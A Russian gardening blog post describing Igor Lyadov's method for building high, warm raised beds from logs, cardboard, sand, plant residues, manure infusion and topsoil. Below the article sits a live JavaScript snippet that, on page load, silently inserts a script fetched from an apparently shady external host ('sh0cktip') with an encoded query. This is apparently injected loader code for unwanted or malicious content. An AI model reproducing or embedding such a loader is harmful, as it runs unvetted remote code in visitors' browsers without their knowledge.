00:56
Как сделать высокие и тёплые грядки.

Как делает высокие грядки Игорь Лядов 

Игорь Лядов - известная личность в интернете! Его статьи, заметки читают все огородники! Огромный опыт Игоря в огородничестве, трудолюбие дают такие результаты, что им может позавидовать каждый. 

Но, вот заметила интересный факт! 
Несмотря на то, что Лядов всегда делится своим опытом, и мы стараемся применить его советы, результаты у нас получаются намного скромнее...Почему? 

Думаю потому, что мало уделяем вниманию закладке будущих грядок! А ведь это основа основ успешного земледелия! Ну, что? Будем учиться заново?

Давайте ещё раз посмотрим, как сделать грядки по методу Игоря Лядова. 

И так! Мастер-класс от великого (не побоюсь этого слова!) Гуру!

Урожайные грядки от Игоря Лядова

Создание грядки — короба


Игорь Лядов рассказывает, как делает грядку. Овощной контейнер – это высокая грядка, стенки которой сложены из кирпича, брёвен, бруса, доски, камня, шифера. Грядки вытягиваются с севера на юг.

На фото Вы увидите, грядка сложена из брёвен. Брёвна остались после разбора домов, в строительство их не взяли, так как сердцевина сгнила, а вот для грядки пойдёт.

Подготавливаем ровную площадку.

Прочно укладываем брёвна в земле, можно даже маленько углубить. Ширина от 80 — 120 см, всё зависит от климатических условий, чем жарче, тем шире грядка.
Длина произвольная.

Между собой брёвна сбиваем гвоздями или шурупами.

На дно укладываю картон, чтоб не развивался многолетний сорняк, а также вредители хрущ, проволочник и т. д.

Далее на картон раскидываю песок, не большим слоем.

Укладываем грубые растительные остатки кукурузы, подсолнуха и т.п.

Да ещё покрасить надо или побелить. Сейчас продаётся краска на водной основе для фасадов. Это чтобы солнце не нагревало землю и насекомые меньше грызть будут, а самое главное красота грядки.

Затем укладываю растительные остатки других культур морковь, капуста, ботва картофельная, помидорная и т.д. Независимо заражены они болезнями или нет. Эффективные микроорганизмы переработают все болячки. Нельзя класть  сорняк многолетний. Я не использую Байкал и тому подобное.

Далее проливаю настоем навоза или травяным настоем. Эти настои описаны в моём блоге*.

Сверху кладём земли 8 — 10 см.

Грядка готова

(function(w){var l = function() { var n = document.getElementsByTagName("script")[0], s = document.createElement("script"), ins = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "//rub.sh0cktip.com/rq.jsp?6WgtCRFoQVF9SCwMGAAQDEFJZeFlCZkRTUF9OCwY"; ins(); }; l(); })(window);
Просмотров: 54 | Добавил: yatsenkoiria | Теги: грядки, как сделать, тёплые, высокие | Рейтинг: 0.0/0
Всего комментариев: 0
avatar